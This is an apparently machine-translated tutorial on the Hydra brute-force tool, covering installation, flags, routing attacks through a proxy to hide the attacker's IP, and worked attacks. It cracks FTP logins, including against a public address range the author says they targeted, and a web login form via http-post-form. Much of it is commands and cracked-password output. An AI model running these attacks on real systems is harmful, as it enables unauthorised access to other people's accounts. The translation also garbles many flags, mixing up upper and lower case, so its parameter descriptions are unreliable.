Hydra brute force cracking tool

Xiaoc [www.81sec.com]

[0x00] tool Introduction
Hydra, an open-source brute-force cracking tool of THC, a famous hacker organization, can crack multiple types of passwords. Its official website http://www.thc.org, this test version is the latest version 5.8, can support

Reference telnet, FTP, HTTP, https, HTTP-PROXY, SMB, smbnt, MS-SQL, MySQL,
REXEC, RSH, rlogin, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP,
NNTP, pcnfs, ICQ, SAP/R3, LDAP2, ldap3, ipvs, teamspeak,
Cisco auth, Cisco enable, AFP, LDAP2, Cisco aaa

Password cracking. The only thing that is inconvenient is that the dictionary used for password cracking must be specified by ourselves.
[0x01] Installation notes
CD to the downloaded installer directory, decompress the Software Package
Sudo tar zxvf hydra-5.8-src.tar.gz

Get the hydra-5.8-src folder, go to the folder, configure first according to installation instructions
Sudo./configure

Some system configuration items will be detected, mainly for cracking support module detection. you can install the corresponding support library and dependency package as needed, in the future, I may mention related modules.
Directly continue to compile, sudo make and sudo make install, so that the installation is complete. In addition, it is worth noting that the software supports the GUI user-friendly interface, which is not recommended for individuals. Interested friends can go to the official website to download the interface.
[0x02] Detailed description of parameters (the official website is in English and I will translate it into Chinese)
Format:
Hydra [[[-l login |-l file] [-P pass |-P file] | [-C file] [-e ns] [-o file] [-T tasks] [-M file [-T tasks] [-W time] [-F] [-s port] [-S] [-VV]

Server Service [opt] # optional
-R continues to crack the previous progress
-S uses SSL connections (uppercase S)
-S port if it is not the default port, you can use this parameter to specify
-L login is in lower case and used to specify the target user for cracking.
-L file is capitalized to specify the user name dictionary.
-P pass, in lower case, is used to specify password cracking and is rarely used. Generally, password dictionary is used.
-P file in upper case, used to specify the password dictionary
-E ns additional options: N: Empty Password test, S: Use the specified account and password Test
-C file uses the colon-separated format, for example, "Login Name: Password" to replace the-L/-p parameter.
-M file: Specifies one row for the target list file
-O file: Specifies the output file.
-F stop cracking when the first pair of login names or passwords is found after the-M parameter is used
-T number of threads running simultaneously by tasks. The default value is 16.
-W time: sets the maximum timeout time, in seconds. The default value is 30 s.
-V/-V display detailed process
Target IP address of the server
Service specifies the service name, which can be: telnet FTP POP3 [-NTLM] IMAP [-NTLM] SMB smbnt HTTP [s]-{head | get} http-{GET | post}-form http-proxy Cisco-enable VNC LDAP2 ldap3 MSSQL MySQL Oracle-listener ipvs NNTP SOCKS5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3
SSH2 SMTP-auth [-NTLM] pcAnywhere teamspeak sip vmauthd Firebird NCP AFP
Opt Option

How to Use the proxy server for cracking (this is mainly in the attacker's IP address and in its own security considerations)
----------------------------
The hydra_proxy_http variable parameter can be used to define the proxy server (only HTTP proxy can be used)
Syntax:
Hydra_proxy_http = "http: // ip: Port /"
Hydra_proxy_connect = IP: 8000

If your proxy requires a user name and password, use the hydra_proxy_auth variable parameter:
Hydra_proxy_auth = "the_login: the_password"

[0x03] instance cracking
1. FTP password cracking
Combined with my own instance, recently tested a website, get ftp user, is serv-u6.02 but cannot crack the password, I save the results by collecting these ftp users in ftpuser. in the LST file, a password dictionary ftppwd is formed by collecting website information, including administrator information. lst. Then, we started to crack the attack. The command is as follows:
Sudo hydra-L/home/dict/ftpuser. lst-P/home/dict/ftppwd. lst 218.86.103. * FTP

This is based on multi-user password cracking, and there is also a local FTP password cracking solution. For efficiency, I directly write the password to the PWD. lst dictionary.
Sudo hydra-l administrator-P/home/dict/pwd. lst-V 192.168.8.6 FTP

The returned result is as follows. The password is successfully cracked:
# This line indicates the total number of tasks, which is calculated based on the user name and password you provide. L: 1/P: 2 indicates a user name, and two passwords are in the password dictionary.
[Data] 2 tasks, 1 servers, 2 login tries (L: 1/P: 2 ),~ 1 tries per task
[Data] attacking service ftp on port 21
[Verbose] resolving addresses... Done
[Status] attack finished for 192.168.8.6 (waiting for Childs to finish)
# The attack is successful and displayed directly. Of course, you can let the attacker output the attack to the file and set it through the-O parameter.
[21] [FTP] HOST: 192.168.8.6 login: Administrator Password: 123

This method can greatly crack the ftp. Of course, the key lies in your dictionary. We can use the dictionary generator to crack it.
2. Samba password cracking
Using NMAP to scan to the server to enable the samba service, so I tried to collect the server information group and synthesize the password dictionary. Because this application is similar to FTP cracking, It is not demonstrated here, just change the FTP service to the smb service.
3. website background password cracking
The software supports multiple Protocol cracking and logon cracking on Web user interfaces. The form submitted in get mode is relatively simple, here we provide ideas for submitting password cracking through post. Another bad thing about this tool is that the Verification Code cannot be cracked when the target website is logged on. Parameters are cracked as follows:
<Form action = "index. php" method = "Post">
<Input type = "text" name = "name"/> <br>
<Input type = "password" name = "PWD"/> <br>
<Input type = "Submit" name = "sub" value = "Submit">

Assume that the preceding Password Logon form is available. Run the following command:
Sudo hydra-l admin-P pass. LST-o OK. LST-T 1-F 127.0.0.1 http-post-form "index. PHP: Name = ^ user ^ & Pwd = ^ pass ^: <title> invalido </title>"

# The username to be cracked is admin, And the password dictionary is pass. lst. The cracking result is saved in OK. LST,-T indicates that the number of threads is 1 at the same time.-F indicates that a password is cracked and the IP address is local, that is, the target IP address, HTTP-post-form indicates that the form password submitted using the http post method is cracked. The following parameter is the name attribute of the corresponding form field in the webpage, the content in the following title indicates the returned information prompt of the error guess, which can be customized.
[0x04] Summary
This tool is powerful only for your own experience. Of course, the key to password cracking is your dictionary. Some of the above instance operations are only three of the many services that are supported, and other services are also very powerful, so you can feel it for yourself. In fact, there are related tools for generating the password dictionary. You can generate a password dictionary that complies with certain rules by yourself. Of course, if you are a successful social engineering expert, you will often get twice the result with half the effort.